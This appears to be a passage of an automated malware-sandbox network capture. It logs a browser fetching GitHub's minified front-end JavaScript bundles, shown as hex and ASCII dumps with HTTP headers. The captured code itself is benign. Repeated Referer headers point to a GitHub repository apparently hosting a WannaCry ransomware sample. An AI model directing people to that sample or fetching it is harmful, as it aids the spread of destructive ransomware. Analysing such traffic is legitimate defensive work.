                                                                                      2024-03-23 14:47:25 UTC608INData Raw: 6c 6c 52 65 73 74 6f 72 61 74 69 6f 6e 3d 22 75 73 65 53 63 72 6f 6c 6c 52 65 73 74 6f 72 61 74 69 6f 6e 22 2c 65 2e 55 73 65 53 75 62 6d 69 74 3d 22 75 73 65 53 75 62 6d 69 74 22 2c 65 2e 55 73 65 53 75 62 6d 69 74 46 65 74 63 68 65 72 3d 22 75 73 65 53 75 62 6d 69 74 46 65 74 63 68 65 72 22 2c 65 2e 55 73 65 46 65 74 63 68 65 72 3d 22 75 73 65 46 65 74 63 68 65 72 22 2c 65 2e 75 73 65 56 69 65 77 54 72 61 6e 73 69 74 69 6f 6e 53 74 61 74 65 3d 22 75 73 65 56 69 65 77 54 72 61 6e 73 69 74 69 6f 6e 53 74 61 74 65 22 7d 28 61 7c 7c 28 61 3d 7b 7d 29 29 2c 66 75 6e 63 74 69 6f 6e 28 65 29 7b 65 2e 55 73 65 46 65 74 63 68 65 72 3d 22 75 73 65 46 65 74 63 68 65 72 22 2c 65 2e 55 73 65 46 65 74 63 68 65 72 73 3d 22 75 73 65 46 65 74 63 68 65 72 73 22 2c 65 2e
                                                                                      Data Ascii: llRestoration="useScrollRestoration",e.UseSubmit="useSubmit",e.UseSubmitFetcher="useSubmitFetcher",e.UseFetcher="useFetcher",e.useViewTransitionState="useViewTransitionState"}(a||(a={})),function(e){e.UseFetcher="useFetcher",e.UseFetchers="useFetchers",e.


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      56192.168.2.1649760185.199.109.1544436264C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      2024-03-23 14:47:24 UTC702OUTGET /assets/vendors-node_modules_primer_react_lib-esm_PageLayout_PageLayout_js-5a4a31c01bca.js HTTP/1.1
                                                                                      Host: github.githubassets.com
                                                                                      Connection: keep-alive
                                                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                      Origin: https://github.com
                                                                                      sec-ch-ua-mobile: ?0
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                      sec-ch-ua-platform: "Windows"
                                                                                      Accept: */*
                                                                                      Sec-Fetch-Site: cross-site
                                                                                      Sec-Fetch-Mode: cors
                                                                                      Sec-Fetch-Dest: script
                                                                                      Referer: https://github.com/chronosmiki/RANSOMWARE-WANNACRY-2.0/blob/master/Ransomware.WannaCry.zip
                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                      2024-03-23 14:47:24 UTC688INHTTP/1.1 200 OK
                                                                                      Connection: close
                                                                                      Content-Length: 14255
                                                                                      Cache-Control: public, max-age=31536000, immutable
                                                                                      Content-Type: application/javascript
                                                                                      Last-Modified: Thu, 08 Feb 2024 11:06:17 GMT
                                                                                      ETag: 0x8DC2895F938FBED
                                                                                      Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
                                                                                      Via: 1.1 varnish, 1.1 varnish
                                                                                      Accept-Ranges: bytes
                                                                                      Date: Sat, 23 Mar 2024 14:47:24 GMT
                                                                                      Age: 1941845
                                                                                      X-Served-By: cache-iad-kiad7000152-IAD, cache-lga21947-LGA
                                                                                      X-Cache: HIT, HIT
                                                                                      X-Cache-Hits: 240, 1
                                                                                      Vary: Accept-Encoding
                                                                                      Cross-Origin-Resource-Policy: cross-origin
                                                                                      Access-Control-Allow-Origin: *
                                                                                      Strict-Transport-Security: max-age=31536000
                                                                                      X-Fastly-Request-ID: d4806722a6c39522e8942645a0776afebfab907c
                                                                                      2024-03-23 14:47:24 UTC1378INData Raw: 22 75 73 65 20 73 74 72 69 63 74 22 3b 28 67 6c 6f 62 61 6c 54 68 69 73 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 3d 67 6c 6f 62 61 6c 54 68 69 73 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 7c 7c 5b 5d 29 2e 70 75 73 68 28 5b 5b 22 76 65 6e 64 6f 72 73 2d 6e 6f 64 65 5f 6d 6f 64 75 6c 65 73 5f 70 72 69 6d 65 72 5f 72 65 61 63 74 5f 6c 69 62 2d 65 73 6d 5f 50 61 67 65 4c 61 79 6f 75 74 5f 50 61 67 65 4c 61 79 6f 75 74 5f 6a 73 22 5d 2c 7b 38 31 33 31 33 3a 28 65 2c 74 2c 6e 29 3d 3e 7b 6c 65 74 20 72 3b 6e 2e 64 28 74 2c 7b 58 3a 28 29 3d 3e 58 7d 29 3b 76 61 72 20 61 3d 6e 28 36 37 32 39 34 29 2c 69 3d 6e 28 31 35 33 38 38 29 2c 6c 3d 6e 28 34 32 34 38 33 29 2c 6f 3d 6e 28 31 34 35 34 33 29 2c 64 3d 6e 28 33 31 31 37 31 29 2c 75 3d 6e 28 31 31 37 39 31 29 2c 73
                                                                                      Data Ascii: "use strict";(globalThis.webpackChunk=globalThis.webpackChunk||[]).push([["vendors-node_modules_primer_react_lib-esm_PageLayout_PageLayout_js"],{81313:(e,t,n)=>{let r;n.d(t,{X:()=>X});var a=n(67294),i=n(15388),l=n(42483),o=n(14543),d=n(31171),u=n(11791),s
                                                                                      2024-03-23 14:47:24 UTC1378INData Raw: 3d 69 2e 74 68 72 65 73 68 6f 6c 64 73 7c 7c 28 41 72 72 61 79 2e 69 73 41 72 72 61 79 28 65 2e 74 68 72 65 73 68 6f 6c 64 29 3f 65 2e 74 68 72 65 73 68 6f 6c 64 3a 5b 65 2e 74 68 72 65 73 68 6f 6c 64 7c 7c 30 5d 29 2c 6e 3d 7b 69 64 3a 74 2c 6f 62 73 65 72 76 65 72 3a 69 2c 65 6c 65 6d 65 6e 74 73 3a 61 7d 2c 66 2e 73 65 74 28 74 2c 6e 29 7d 72 65 74 75 72 6e 20 6e 7d 28 6e 29 2c 64 3d 6f 2e 67 65 74 28 65 29 7c 7c 5b 5d 3b 72 65 74 75 72 6e 20 6f 2e 68 61 73 28 65 29 7c 7c 6f 2e 73 65 74 28 65 2c 64 29 2c 64 2e 70 75 73 68 28 74 29 2c 6c 2e 6f 62 73 65 72 76 65 28 65 29 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 64 2e 73 70 6c 69 63 65 28 64 2e 69 6e 64 65 78 4f 66 28 74 29 2c 31 29 2c 30 3d 3d 3d 64 2e 6c 65 6e 67 74 68 26 26 28 6f 2e 64 65 6c 65 74 65 28 65
                                                                                      Data Ascii: =i.thresholds||(Array.isArray(e.threshold)?e.threshold:[e.threshold||0]),n={id:t,observer:i,elements:a},f.set(t,n)}return n}(n),d=o.get(e)||[];return o.has(e)||o.set(e,d),d.push(t),l.observe(e),function(){d.splice(d.indexOf(t),1),0===d.length&&(o.delete(e
                                                                                      2024-03-23 14:47:24 UTC1378INData Raw: 2c 70 61 64 64 69 6e 67 3a 74 3d 22 6e 6f 72 6d 61 6c 22 2c 72 6f 77 47 61 70 3a 6e 3d 22 6e 6f 72 6d 61 6c 22 2c 63 6f 6c 75 6d 6e 47 61 70 3a 72 3d 22 6e 6f 72 6d 61 6c 22 2c 63 68 69 6c 64 72 65 6e 3a 69 2c 73 78 3a 6f 3d 7b 7d 2c 5f 73 6c 6f 74 73 43 6f 6e 66 69 67 3a 64 7d 29 3d 3e 7b 6c 65 74 7b 72 6f 6f 74 52 65 66 3a 75 2c 65 6e 61 62 6c 65 53 74 69 63 6b 79 50 61 6e 65 3a 63 2c 64 69 73 61 62 6c 65 53 74 69 63 6b 79 50 61 6e 65 3a 70 2c 63 6f 6e 74 65 6e 74 54 6f 70 52 65 66 3a 67 2c 63 6f 6e 74 65 6e 74 42 6f 74 74 6f 6d 52 65 66 3a 66 2c 73 74 69 63 6b 79 50 61 6e 65 48 65 69 67 68 74 3a 77 7d 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 6c 65 74 20 65 3d 61 2e 75 73 65 52 65 66 28 6e 75 6c 6c 29 2c 5b 74 2c 6e 5d 3d 61 2e 75 73 65 53 74 61 74 65 28 6b
                                                                                      Data Ascii: ,padding:t="normal",rowGap:n="normal",columnGap:r="normal",children:i,sx:o={},_slotsConfig:d})=>{let{rootRef:u,enableStickyPane:c,disableStickyPane:p,contentTopRef:g,contentBottomRef:f,stickyPaneHeight:w}=function(){let e=a.useRef(null),[t,n]=a.useState(k
                                                                                      2024-03-23 14:47:24 UTC1378INData Raw: 63 6b 79 2d 70 61 6e 65 2d 68 65 69 67 68 74 22 3a 77 7d 2c 73 78 3a 6d 28 29 28 7b 70 61 64 64 69 6e 67 3a 43 5b 74 5d 7d 2c 6f 29 7d 2c 61 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 6c 2e 5a 2c 7b 73 78 3a 7b 6d 61 78 57 69 64 74 68 3a 52 5b 65 5d 2c 6d 61 72 67 69 6e 58 3a 22 61 75 74 6f 22 2c 64 69 73 70 6c 61 79 3a 22 66 6c 65 78 22 2c 66 6c 65 78 57 72 61 70 3a 22 77 72 61 70 22 7d 7d 2c 62 2e 68 65 61 64 65 72 2c 61 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 6c 2e 5a 2c 7b 73 78 3a 7b 64 69 73 70 6c 61 79 3a 22 66 6c 65 78 22 2c 66 6c 65 78 3a 22 31 20 31 20 31 30 30 25 22 2c 66 6c 65 78 57 72 61 70 3a 22 77 72 61 70 22 2c 6d 61 78 57 69 64 74 68 3a 22 31 30 30 25 22 7d 7d 2c 45 29 2c 62 2e 66 6f 6f 74 65 72 29 29 29 7d 3b 4e 2e 64 69 73 70 6c
                                                                                      Data Ascii: cky-pane-height":w},sx:m()({padding:C[t]},o)},a.createElement(l.Z,{sx:{maxWidth:R[e],marginX:"auto",display:"flex",flexWrap:"wrap"}},b.header,a.createElement(l.Z,{sx:{display:"flex",flex:"1 1 100%",flexWrap:"wrap",maxWidth:"100%"}},E),b.footer)))};N.displ
                                                                                      2024-03-23 14:47:24 UTC1378INData Raw: 62 6c 65 43 6c 69 63 6b 3a 6f 2c 73 78 3a 64 3d 7b 7d 7d 29 3d 3e 7b 6c 65 74 5b 73 2c 63 5d 3d 61 2e 75 73 65 53 74 61 74 65 28 21 31 29 2c 5b 70 2c 67 5d 3d 61 2e 75 73 65 53 74 61 74 65 28 21 31 29 2c 66 3d 28 30 2c 75 2e 56 74 29 28 65 2c 22 6e 6f 6e 65 22 29 2c 77 3d 61 2e 75 73 65 52 65 66 28 72 29 2c 68 3d 61 2e 75 73 65 52 65 66 28 69 29 2c 7b 70 61 6e 65 52 65 66 3a 76 7d 3d 61 2e 75 73 65 43 6f 6e 74 65 78 74 28 53 29 2c 5b 78 2c 79 5d 3d 61 2e 75 73 65 53 74 61 74 65 28 30 29 2c 5b 62 2c 45 5d 3d 61 2e 75 73 65 53 74 61 74 65 28 30 29 2c 5b 6b 2c 4c 5d 3d 61 2e 75 73 65 53 74 61 74 65 28 30 29 3b 72 65 74 75 72 6e 20 61 2e 75 73 65 45 66 66 65 63 74 28 28 29 3d 3e 7b 69 66 28 6e 75 6c 6c 21 3d 3d 76 2e 63 75 72 72 65 6e 74 29 7b 6c 65 74 20 65
                                                                                      Data Ascii: bleClick:o,sx:d={}})=>{let[s,c]=a.useState(!1),[p,g]=a.useState(!1),f=(0,u.Vt)(e,"none"),w=a.useRef(r),h=a.useRef(i),{paneRef:v}=a.useContext(S),[x,y]=a.useState(0),[b,E]=a.useState(0),[k,L]=a.useState(0);return a.useEffect(()=>{if(null!==v.current){let e
                                                                                      2024-03-23 14:47:25 UTC1378INData Raw: 76 65 22 2c 65 29 2c 77 69 6e 64 6f 77 2e 72 65 6d 6f 76 65 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 22 6d 6f 75 73 65 75 70 22 2c 74 29 2c 77 69 6e 64 6f 77 2e 72 65 6d 6f 76 65 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 22 6b 65 79 64 6f 77 6e 22 2c 6e 29 2c 77 69 6e 64 6f 77 2e 72 65 6d 6f 76 65 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 22 6b 65 79 75 70 22 2c 72 29 2c 64 6f 63 75 6d 65 6e 74 2e 62 6f 64 79 2e 72 65 6d 6f 76 65 41 74 74 72 69 62 75 74 65 28 22 64 61 74 61 2d 70 61 67 65 2d 6c 61 79 6f 75 74 2d 64 72 61 67 67 69 6e 67 22 29 29 2c 28 29 3d 3e 7b 77 69 6e 64 6f 77 2e 72 65 6d 6f 76 65 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 22 6d 6f 75 73 65 6d 6f 76 65 22 2c 65 29 2c 77 69 6e 64 6f 77 2e 72 65 6d 6f 76 65 45 76 65 6e 74 4c 69 73 74 65
                                                                                      Data Ascii: ve",e),window.removeEventListener("mouseup",t),window.removeEventListener("keydown",n),window.removeEventListener("keyup",r),document.body.removeAttribute("data-page-layout-dragging")),()=>{window.removeEventListener("mousemove",e),window.removeEventListe
                                                                                      2024-03-23 14:47:25 UTC1378INData Raw: 3a 66 7d 3d 61 2e 75 73 65 43 6f 6e 74 65 78 74 28 53 29 3b 72 65 74 75 72 6e 20 61 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 6c 2e 5a 2c 7b 61 73 3a 22 68 65 61 64 65 72 22 2c 22 61 72 69 61 2d 6c 61 62 65 6c 22 3a 65 2c 22 61 72 69 61 2d 6c 61 62 65 6c 6c 65 64 62 79 22 3a 74 2c 68 69 64 64 65 6e 3a 67 2c 73 78 3a 6d 28 29 28 7b 77 69 64 74 68 3a 22 31 30 30 25 22 2c 6d 61 72 67 69 6e 42 6f 74 74 6f 6d 3a 43 5b 66 5d 7d 2c 73 29 7d 2c 61 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 6c 2e 5a 2c 7b 73 78 3a 7b 70 61 64 64 69 6e 67 3a 43 5b 6e 5d 7d 7d 2c 64 29 2c 61 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 44 2c 7b 76 61 72 69 61 6e 74 3a 70 2c 73 78 3a 7b 6d 61 72 67 69 6e 54 6f 70 3a 43 5b 66 5d 7d 7d 29 29 7d 3b 50 2e 64 69 73 70 6c 61 79 4e 61
                                                                                      Data Ascii: :f}=a.useContext(S);return a.createElement(l.Z,{as:"header","aria-label":e,"aria-labelledby":t,hidden:g,sx:m()({width:"100%",marginBottom:C[f]},s)},a.createElement(l.Z,{sx:{padding:C[n]}},d),a.createElement(D,{variant:p,sx:{marginTop:C[f]}}))};P.displayNa
                                                                                      2024-03-23 14:47:25 UTC1378INData Raw: 65 4b 65 79 3a 77 3d 22 70 61 6e 65 57 69 64 74 68 22 2c 64 69 76 69 64 65 72 3a 68 3d 22 6e 6f 6e 65 22 2c 64 69 76 69 64 65 72 57 68 65 6e 4e 61 72 72 6f 77 3a 76 3d 22 69 6e 68 65 72 69 74 22 2c 73 74 69 63 6b 79 3a 78 3d 21 31 2c 6f 66 66 73 65 74 48 65 61 64 65 72 3a 79 3d 30 2c 68 69 64 64 65 6e 3a 62 3d 21 31 2c 63 68 69 6c 64 72 65 6e 3a 45 2c 69 64 3a 6b 2c 73 78 3a 52 3d 7b 7d 7d 2c 4e 29 3d 3e 7b 6c 65 74 20 24 3d 28 30 2c 75 2e 66 64 29 28 6e 29 7c 7c 22 69 6e 68 65 72 69 74 22 3d 3d 3d 72 3f 6e 3a 7b 72 65 67 75 6c 61 72 3a 6e 2c 6e 61 72 72 6f 77 3a 72 7d 2c 56 3d 28 30 2c 75 2e 56 74 29 28 24 2c 22 65 6e 64 22 29 2c 41 3d 28 30 2c 75 2e 66 64 29 28 68 29 7c 7c 22 69 6e 68 65 72 69 74 22 3d 3d 3d 76 3f 68 3a 7b 72 65 67 75 6c 61 72 3a 68 2c
                                                                                      Data Ascii: eKey:w="paneWidth",divider:h="none",dividerWhenNarrow:v="inherit",sticky:x=!1,offsetHeader:y=0,hidden:b=!1,children:E,id:k,sx:R={}},N)=>{let $=(0,u.fd)(n)||"inherit"===r?n:{regular:n,narrow:r},V=(0,u.Vt)($,"end"),A=(0,u.fd)(h)||"inherit"===v?h:{regular:h,
                                                                                      2024-03-23 14:47:25 UTC1378INData Raw: 6d 61 72 67 69 6e 42 6f 74 74 6f 6d 22 3a 22 6d 61 72 67 69 6e 54 6f 70 22 5d 3a 43 5b 42 5d 7d 7d 29 2c 61 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 6c 2e 5a 2c 4c 28 7b 72 65 66 3a 54 2c 73 74 79 6c 65 3a 7b 22 2d 2d 70 61 6e 65 2d 77 69 64 74 68 22 3a 60 24 7b 4a 7d 70 78 60 7d 2c 73 78 3a 65 3d 3e 28 7b 22 2d 2d 70 61 6e 65 2d 6d 69 6e 2d 77 69 64 74 68 22 3a 49 28 69 29 3f 69 2e 6d 69 6e 3a 60 24 7b 73 7d 70 78 60 2c 22 2d 2d 70 61 6e 65 2d 6d 61 78 2d 77 69 64 74 68 2d 64 69 66 66 22 3a 22 35 31 31 70 78 22 2c 22 2d 2d 70 61 6e 65 2d 6d 61 78 2d 77 69 64 74 68 22 3a 49 28 69 29 3f 69 2e 6d 61 78 3a 22 63 61 6c 63 28 31 30 30 76 77 20 2d 20 76 61 72 28 2d 2d 70 61 6e 65 2d 6d 61 78 2d 77 69 64 74 68 2d 64 69 66 66 29 29 22 2c 77 69 64 74 68 3a 66
                                                                                      Data Ascii: marginBottom":"marginTop"]:C[B]}}),a.createElement(l.Z,L({ref:T,style:{"--pane-width":`${J}px`},sx:e=>({"--pane-min-width":I(i)?i.min:`${s}px`,"--pane-max-width-diff":"511px","--pane-max-width":I(i)?i.max:"calc(100vw - var(--pane-max-width-diff))",width:f
                                                                                      2024-03-23 14:47:25 UTC1378INData Raw: 64 69 73 70 6c 61 79 4e 61 6d 65 3d 22 46 6f 6f 74 65 72 22 2c 7a 2e 64 69 73 70 6c 61 79 4e 61 6d 65 3d 22 50 61 67 65 4c 61 79 6f 75 74 2e 46 6f 6f 74 65 72 22 3b 6c 65 74 20 58 3d 4f 62 6a 65 63 74 2e 61 73 73 69 67 6e 28 4e 2c 7b 48 65 61 64 65 72 3a 50 2c 43 6f 6e 74 65 6e 74 3a 42 2c 50 61 6e 65 3a 6a 2c 46 6f 6f 74 65 72 3a 7a 7d 29 7d 2c 31 31 37 39 31 3a 28 65 2c 74 2c 6e 29 3d 3e 7b 6e 2e 64 28 74 2c 7b 66 64 3a 28 29 3d 3e 64 2c 56 74 3a 28 29 3d 3e 75 2c 64 71 3a 28 29 3d 3e 6f 7d 29 3b 76 61 72 20 72 3d 6e 28 36 37 32 39 34 29 2c 61 3d 6e 28 34 31 36 33 32 29 3b 66 75 6e 63 74 69 6f 6e 20 69 28 65 2c 74 29 7b 6c 65 74 20 6e 3d 28 30 2c 72 2e 75 73 65 43 6f 6e 74 65 78 74 29 28 6c 29 2c 5b 69 2c 6f 5d 3d 72 2e 75 73 65 53 74 61 74 65 28 28 29
                                                                                      Data Ascii: displayName="Footer",z.displayName="PageLayout.Footer";let X=Object.assign(N,{Header:P,Content:B,Pane:j,Footer:z})},11791:(e,t,n)=>{n.d(t,{fd:()=>d,Vt:()=>u,dq:()=>o});var r=n(67294),a=n(41632);function i(e,t){let n=(0,r.useContext)(l),[i,o]=r.useState(()


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      57192.168.2.1649761185.199.109.1544436264C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      2024-03-23 14:47:24 UTC718OUTGET /assets/vendors-node_modules_primer_react_lib-esm_ConfirmationDialog_ConfirmationDialog_js-8ab472e2f924.js HTTP/1.1
                                                                                      Host: github.githubassets.com
                                                                                      Connection: keep-alive
                                                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                      Origin: https://github.com
                                                                                      sec-ch-ua-mobile: ?0
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                      sec-ch-ua-platform: "Windows"
                                                                                      Accept: */*
                                                                                      Sec-Fetch-Site: cross-site
                                                                                      Sec-Fetch-Mode: cors
                                                                                      Sec-Fetch-Dest: script
                                                                                      Referer: https://github.com/chronosmiki/RANSOMWARE-WANNACRY-2.0/blob/master/Ransomware.WannaCry.zip
                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                      2024-03-23 14:47:25 UTC689INHTTP/1.1 200 OK
                                                                                      Connection: close
                                                                                      Content-Length: 16959
                                                                                      Cache-Control: public, max-age=31536000, immutable
                                                                                      Content-Type: application/javascript
                                                                                      Last-Modified: Wed, 28 Feb 2024 05:33:44 GMT
                                                                                      ETag: 0x8DC381ED46A2496
                                                                                      Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
                                                                                      Via: 1.1 varnish, 1.1 varnish
                                                                                      Accept-Ranges: bytes
                                                                                      Date: Sat, 23 Mar 2024 14:47:25 GMT
                                                                                      Age: 1941844
                                                                                      X-Served-By: cache-iad-kjyo7100172-IAD, cache-lga21937-LGA
                                                                                      X-Cache: HIT, HIT
                                                                                      X-Cache-Hits: 1051, 1
                                                                                      Vary: Accept-Encoding
                                                                                      Cross-Origin-Resource-Policy: cross-origin
                                                                                      Access-Control-Allow-Origin: *
                                                                                      Strict-Transport-Security: max-age=31536000
                                                                                      X-Fastly-Request-ID: c007c72f1d0800a10c217f52ff59a5259eea41e3
                                                                                      2024-03-23 14:47:25 UTC1378INData Raw: 28 67 6c 6f 62 61 6c 54 68 69 73 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 3d 67 6c 6f 62 61 6c 54 68 69 73 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 7c 7c 5b 5d 29 2e 70 75 73 68 28 5b 5b 22 76 65 6e 64 6f 72 73 2d 6e 6f 64 65 5f 6d 6f 64 75 6c 65 73 5f 70 72 69 6d 65 72 5f 72 65 61 63 74 5f 6c 69 62 2d 65 73 6d 5f 43 6f 6e 66 69 72 6d 61 74 69 6f 6e 44 69 61 6c 6f 67 5f 43 6f 6e 66 69 72 6d 61 74 69 6f 6e 44 69 61 6c 6f 67 5f 6a 73 22 5d 2c 7b 32 37 32 33 33 3a 28 65 2c 74 2c 6e 29 3d 3e 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 6e 2e 64 28 74 2c 7b 5a 3a 28 29 3d 3e 63 7d 29 3b 76 61 72 20 6f 3d 6e 28 36 37 32 39 34 29 2c 61 3d 6e 28 31 35 33 38 38 29 2c 72 3d 6e 28 34 32 33 37 39 29 2c 69 3d 6e 28 38 33 38 36 29 3b 66 75 6e 63 74 69 6f 6e 20 6c 28 29 7b 72
                                                                                      Data Ascii: (globalThis.webpackChunk=globalThis.webpackChunk||[]).push([["vendors-node_modules_primer_react_lib-esm_ConfirmationDialog_ConfirmationDialog_js"],{27233:(e,t,n)=>{"use strict";n.d(t,{Z:()=>c});var o=n(67294),a=n(15388),r=n(42379),i=n(8386);function l(){r
                                                                                      2024-03-23 14:47:25 UTC1378INData Raw: 74 46 61 6d 69 6c 79 3a 61 2c 6c 69 6e 65 48 65 69 67 68 74 3a 72 2c 22 64 61 74 61 2d 70 6f 72 74 61 6c 2d 72 6f 6f 74 22 3a 21 30 2c 22 64 61 74 61 2d 63 6f 6c 6f 72 2d 6d 6f 64 65 22 3a 6e 75 6c 6c 21 3d 75 26 26 75 2e 69 6e 63 6c 75 64 65 73 28 22 64 61 72 6b 22 29 3f 22 64 61 72 6b 22 3a 22 6c 69 67 68 74 22 2c 22 64 61 74 61 2d 6c 69 67 68 74 2d 74 68 65 6d 65 22 3a 6d 2c 22 64 61 74 61 2d 64 61 72 6b 2d 74 68 65 6d 65 22 3a 66 7d 29 2c 6f 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 73 2c 7b 63 6f 6c 6f 72 53 63 68 65 6d 65 3a 6e 75 6c 6c 21 3d 75 26 26 75 2e 69 6e 63 6c 75 64 65 73 28 22 64 61 72 6b 22 29 3f 22 64 61 72 6b 22 3a 22 6c 69 67 68 74 22 7d 29 2c 74 29 7d 63 2e 64 69 73 70 6c 61 79 4e 61 6d 65 3d 22 42 61 73 65 53 74 79 6c 65 73 22 7d
                                                                                      Data Ascii: tFamily:a,lineHeight:r,"data-portal-root":!0,"data-color-mode":null!=u&&u.includes("dark")?"dark":"light","data-light-theme":m,"data-dark-theme":f}),o.createElement(s,{colorScheme:null!=u&&u.includes("dark")?"dark":"light"}),t)}c.displayName="BaseStyles"}
                                                                                      2024-03-23 14:47:25 UTC1378INData Raw: 65 3a 22 43 6f 6e 66 69 72 6d 61 74 69 6f 6e 44 69 61 6c 6f 67 5f 5f 53 74 79 6c 65 64 43 6f 6e 66 69 72 6d 61 74 69 6f 6e 42 6f 64 79 22 2c 63 6f 6d 70 6f 6e 65 6e 74 49 64 3a 22 73 63 2d 31 31 66 7a 30 6a 68 2d 32 22 7d 29 28 5b 22 66 6f 6e 74 2d 73 69 7a 65 3a 22 2c 22 3b 70 61 64 64 69 6e 67 3a 30 20 22 2c 22 20 22 2c 22 20 22 2c 22 3b 63 6f 6c 6f 72 3a 22 2c 22 3b 66 6c 65 78 2d 67 72 6f 77 3a 31 3b 22 5d 2c 28 30 2c 64 2e 55 32 29 28 22 66 6f 6e 74 53 69 7a 65 73 2e 31 22 29 2c 28 30 2c 64 2e 55 32 29 28 22 73 70 61 63 65 2e 33 22 29 2c 28 30 2c 64 2e 55 32 29 28 22 73 70 61 63 65 2e 33 22 29 2c 28 30 2c 64 2e 55 32 29 28 22 73 70 61 63 65 2e 33 22 29 2c 28 30 2c 64 2e 55 32 29 28 22 63 6f 6c 6f 72 73 2e 66 67 2e 6d 75 74 65 64 22 29 29 2c 68 3d 28
                                                                                      Data Ascii: e:"ConfirmationDialog__StyledConfirmationBody",componentId:"sc-11fz0jh-2"})(["font-size:",";padding:0 "," "," ",";color:",";flex-grow:1;"],(0,d.U2)("fontSizes.1"),(0,d.U2)("space.3"),(0,d.U2)("space.3"),(0,d.U2)("space.3"),(0,d.U2)("colors.fg.muted")),h=(
                                                                                      2024-03-23 14:47:25 UTC1378INData Raw: 70 6c 61 79 4e 61 6d 65 3d 22 43 6f 6e 66 69 72 6d 61 74 69 6f 6e 44 69 61 6c 6f 67 22 3b 6c 65 74 20 45 3d 6e 75 6c 6c 3b 61 73 79 6e 63 20 66 75 6e 63 74 69 6f 6e 20 43 28 65 2c 74 29 7b 6c 65 74 7b 63 6f 6e 74 65 6e 74 3a 6e 2c 2e 2e 2e 72 7d 3d 74 3b 72 65 74 75 72 6e 20 6e 65 77 20 50 72 6f 6d 69 73 65 28 74 3d 3e 7b 28 45 7c 7c 3d 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 64 69 76 22 29 29 2e 69 73 43 6f 6e 6e 65 63 74 65 64 7c 7c 64 6f 63 75 6d 65 6e 74 2e 62 6f 64 79 2e 61 70 70 65 6e 64 28 45 29 3b 6c 65 74 20 69 3d 28 30 2c 61 2e 73 29 28 45 29 3b 69 2e 72 65 6e 64 65 72 28 6f 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 6c 2e 66 36 2c 65 2c 6f 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 6d 2e 5a 2c 6e 75 6c 6c 2c
                                                                                      Data Ascii: playName="ConfirmationDialog";let E=null;async function C(e,t){let{content:n,...r}=t;return new Promise(t=>{(E||=document.createElement("div")).isConnected||document.body.append(E);let i=(0,a.s)(E);i.render(o.createElement(l.f6,e,o.createElement(m.Z,null,
                                                                                      2024-03-23 14:47:25 UTC1378INData Raw: 65 6e 74 3a 66 6c 65 78 2d 73 74 61 72 74 3b 7d 26 5b 64 61 74 61 2d 70 6f 73 69 74 69 6f 6e 2d 72 65 67 75 6c 61 72 3d 27 72 69 67 68 74 27 5d 7b 61 6c 69 67 6e 2d 69 74 65 6d 73 3a 63 65 6e 74 65 72 3b 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 3a 66 6c 65 78 2d 65 6e 64 3b 7d 2e 44 69 61 6c 6f 67 4f 76 65 72 66 6c 6f 77 57 72 61 70 70 65 72 7b 66 6c 65 78 2d 67 72 6f 77 3a 31 3b 7d 40 6d 65 64 69 61 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 36 37 70 78 29 7b 26 5b 64 61 74 61 2d 70 6f 73 69 74 69 6f 6e 2d 6e 61 72 72 6f 77 3d 27 63 65 6e 74 65 72 27 5d 7b 61 6c 69 67 6e 2d 69 74 65 6d 73 3a 63 65 6e 74 65 72 3b 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 3a 63 65 6e 74 65 72 3b 7d 26 5b 64 61 74 61 2d 70 6f 73 69 74 69 6f 6e 2d 6e 61 72 72 6f 77 3d 27
                                                                                      Data Ascii: ent:flex-start;}&[data-position-regular='right']{align-items:center;justify-content:flex-end;}.DialogOverflowWrapper{flex-grow:1;}@media (max-width:767px){&[data-position-narrow='center']{align-items:center;justify-content:center;}&[data-position-narrow='
